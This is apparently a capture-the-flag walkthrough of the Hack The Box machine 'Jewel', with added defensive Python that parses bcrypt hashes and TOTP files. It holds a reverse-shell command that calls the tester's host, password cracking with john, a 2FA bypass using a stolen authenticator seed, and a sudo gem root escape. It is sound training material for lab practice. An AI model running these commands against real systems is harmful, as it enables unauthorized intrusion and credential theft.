# Jewel ~ Hack The Box

* * *

### Prerequisite

![Jewel ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985610495/0a9fc841-e5ee-4dfa-8910-cdfb9bcde2ae.jpeg)

To make life easier, I usually add an entry to my hosts file so the target machine can be reached by name.

    echo "10.10.10.211	jewel.htb" >> /etc/hosts

hosts file entry

![Jewel ~ Hack The Box](/content/images/2021/02/image-90.png)

Okay now onto the hacking!

* * *

### Reconnaissance

As always, I started off with an NMAP scan against the machine.

    nmap -Pn -sC -sV -A -p- -oN initial jewel.htb

    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
    |   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
    |_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
    8000/tcp open  http    Apache httpd 2.4.38
    |_http-generator: gitweb/2.20.1 git/2.20.1
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    | http-open-proxy: Potentially OPEN proxy.
    |_Methods supported:CONNECTION
    |_http-server-header: Apache/2.4.38 (Debian)
    | http-title: jewel.htb Git
    |_Requested resource was http://jewel.htb:8000/gitweb/
    8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
    |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
    |_http-title: BL0G!

### Scanning & Enumeration

Based on the scan, I saw that port 8000 was running a web server. This was the web app being served:

![Jewel ~ Hack The Box](/content/images/2021/02/image-93.png)

![Jewel ~ Hack The Box](/content/images/2021/02/image-94.png)

Enumerating further revealed the framework the app was running on and its version:

*   Rails 5.2.2.1

I was able to find an existing CVE for this version of Rails and a [PoC](https://github.com/hybryx/CVE-2020-8165).

### Exploitation

With the help of the PoC, I was able to gain a minimal shell on the remote box, which was running `rails 5.2.2.1`.

First, I had to create an account on the blog, which was running on port 8080.

![Jewel ~ Hack The Box](/content/images/2021/02/image-95.png)

Once I had that account created, I was ready to run the exploit.

![Jewel ~ Hack The Box](/content/images/2021/02/image-96.png)

    ┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
    └─# python3 exploit.py 10.10.10.211 8080 hello@neeranjan.com nee "bash -c 'bash -i >& /dev/tcp/10.10.14.47/666 0>&1'"

![Jewel ~ Hack The Box](/content/images/2021/02/image-97.png)

User.txt flag

I was able to gain a stable shell to the user account.

### Privilege Escalation

For this, I used LinPEAS, as I always do! The privesc script returned a password hash belonging to bill.

![Jewel ~ Hack The Box](/content/images/2021/02/image-98.png)

![Jewel ~ Hack The Box](/content/images/2021/02/image-99.png)

    [+] Searching specific hashes inside files - less false positives (limit 70)
    /home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

I headed off to crack the password with my trusty [dictionary](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Most-Popular-Letter-Passes.txt) from seclists and good ol' john!

![Jewel ~ Hack The Box](/content/images/2021/02/image-100.png)

    ┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
    └─# john password.hash -w=passwd.dict 
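The string LinPEAS pulled out of `bd.sql` is a bcrypt hash in modular crypt format: a version prefix, a two-digit cost, a 22-character salt and a 31-character digest. Being able to read that layout tells a defender how much work each guess costs (2^cost rounds) before any cracking is attempted. The following is an added example, not code from the original post or from LinPEAS; the sample dump is constructed around the hash shown above, and `parse_bcrypt` and `find_bcrypt_hashes` are names chosen here.

```python
import re

# One bcrypt string: $<2a|2b|2x|2y>$<cost>$<22-char salt><31-char digest>
# using the bcrypt base64 alphabet [./A-Za-z0-9].
BCRYPT_RE = re.compile(r"\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}")
BCRYPT_PARTS = re.compile(
    r"\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})"
)

# Constructed sample standing in for a leaked database dump such as bd.sql.
# The hash on line 2 is the one LinPEAS reported above; line 3 is filler.
SAMPLE_DUMP = """-- constructed sample dump, not the real bd.sql
INSERT INTO users VALUES (1, 'bill', '$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW');
INSERT INTO users VALUES (2, 'alice', 'not-a-hash');
"""


def parse_bcrypt(hash_str):
    """Split a bcrypt modular-crypt string into its fields.

    Raises ValueError when the string is not well-formed, so callers can
    distinguish a real hash from something that merely looks like one.
    """
    m = BCRYPT_PARTS.fullmatch(hash_str)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    version, cost, salt, digest = m.groups()
    cost = int(cost)
    if not 4 <= cost <= 31:  # the range bcrypt implementations accept
        raise ValueError("bcrypt cost out of range")
    return {
        "version": version,
        "cost": cost,
        "rounds": 2 ** cost,  # key-setup iterations per password guess
        "salt": salt,
        "digest": digest,
    }


def find_bcrypt_hashes(text):
    """Return (line_number, hash) pairs for every bcrypt hash in text."""
    return [
        (n, h)
        for n, line in enumerate(text.splitlines(), 1)
        for h in BCRYPT_RE.findall(line)
    ]


if __name__ == "__main__":
    for line_no, h in find_bcrypt_hashes(SAMPLE_DUMP):
        info = parse_bcrypt(h)
        print(f"line {line_no}: bcrypt {info['version']}, cost {info['cost']} "
              f"({info['rounds']} rounds), salt {info['salt']}")
```

Cost 12 means 4096 rounds per guess, which slows an offline attack but does not save a password that appears in a common-word list, which is exactly why the dictionary run above worked.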

After that, I tried to run `sudo -l` to see which binaries could be run with sudo.

![Jewel ~ Hack The Box](/content/images/2021/02/image-101.png)

However, I was hit with a 2FA request which prevented me from running the command. After looking around for a bit, I realized that there was a `.google_authenticator` file in the home directory of bill.

![Jewel ~ Hack The Box](/content/images/2021/02/image-102.png)

    bill@jewel:~$ cat .google_authenticator 
    2UQI3R52WFCLE6JTLDCSJYMJH4
    " WINDOW_SIZE 17
    " TOTP_AUTH

I then set up the authenticator on my phone with that secret and was able to get it working!
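The `.google_authenticator` file holds everything needed to produce valid codes: the first line is the base32 TOTP seed, and lines beginning with `" ` are options for the PAM module. The example below is added here and is not code from the original post or from google-authenticator-libpam; it parses that layout, derives codes the RFC 6238 way, and shows what `WINDOW_SIZE` does to the acceptance window. The sample file is constructed with the RFC 6238 reference key rather than the box's secret, and `parse_google_authenticator`, `hotp`, `totp`, `verify` and `audit` are names chosen for this example.

```python
import base64
import hashlib
import hmac
import struct

# Constructed sample in the layout the PAM module writes. The secret is the
# RFC 6238 reference key (ASCII "12345678901234567890" in base32), not a
# real user's secret.
SAMPLE_FILE = '''GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ
" WINDOW_SIZE 17
" TOTP_AUTH
'''

TIME_STEP = 30  # seconds per TOTP counter value


def parse_google_authenticator(text):
    """Return (secret, options) from a .google_authenticator file body."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    secret = lines[0]
    options = {}
    for line in lines[1:]:
        if not line.startswith('" '):
            continue  # any remaining lines are scratch codes or state
        parts = line[2:].split(None, 1)
        options[parts[0]] = parts[1] if len(parts) > 1 else True
    return secret, options


def hotp(secret_b32, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the counter, dynamically truncated."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret_b32, unix_time, digits=6):
    """RFC 6238 TOTP: HOTP with the counter taken from the clock."""
    return hotp(secret_b32, unix_time // TIME_STEP, digits)


def verify(secret_b32, code, unix_time, window_size=3):
    """Accept a code if it matches any of window_size consecutive steps
    centred on now, i.e. (window_size - 1) // 2 steps either side.
    The default of 3 mirrors the PAM module's default window."""
    half = (window_size - 1) // 2
    now = unix_time // TIME_STEP
    return any(hmac.compare_digest(hotp(secret_b32, now + d), code)
               for d in range(-half, half + 1))


def audit(options):
    """Flag settings that widen the acceptance window beyond the default."""
    findings = []
    window = int(options.get("WINDOW_SIZE", 3))
    if window > 3:
        half = (window - 1) // 2
        findings.append(f"WINDOW_SIZE {window}: codes accepted up to "
                        f"{half * TIME_STEP}s either side of now")
    return findings


if __name__ == "__main__":
    secret, opts = parse_google_authenticator(SAMPLE_FILE)
    print("code at T=59:", totp(secret, 59))
    for finding in audit(opts):
        print("audit:", finding)
```

Two things follow from running this: anyone who can read the seed can compute the same codes as the phone, so the file needs to be readable by its owner only, and a `WINDOW_SIZE` of 17 means a code stays valid for roughly four minutes either side of the current step instead of the default one step.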

![Jewel ~ Hack The Box](/content/images/2021/02/image-103.png)

And finally, I was able to run `sudo -l` using bill's account without any issues.

![Jewel ~ Hack The Box](/content/images/2021/02/image-104.png)

Now that I knew bill could run `gem` with sudo privileges, all there was left to do was head to [GTFObins](https://gtfobins.github.io/gtfobins/gem/) and get root!

    sudo gem open -e "/bin/sh -c /bin/sh" rdoc

![Jewel ~ Hack The Box](/content/images/2021/02/image-105.png)

rooty!
